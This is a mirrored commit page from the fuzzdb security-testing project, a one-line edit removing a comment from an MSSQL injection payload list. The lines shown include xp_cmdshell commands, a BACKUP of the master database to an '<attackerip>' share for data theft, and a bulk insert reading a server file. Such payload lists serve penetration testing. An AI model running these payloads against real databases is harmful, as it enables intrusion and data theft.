mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 13:34:12 +00:00
small edit to comment
This commit is contained in:
parent
bbe358e96a
commit
7818740153
1 changed files with 1 additions and 1 deletions
|
@ -11,5 +11,5 @@ exec master..xp_cmdshell 'ipconfig+/all'
|
|||
exec master..xp_cmdshell 'net+view'
|
||||
exec master..xp_cmdshell 'net+users'
|
||||
exec master..xp_cmdshell 'ping+<attackerip>'
|
||||
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat' Backup entire database to a file. This attack can be used to steal a database.
|
||||
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
||||
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|
||||
|
|
Loading…
Reference in a new issue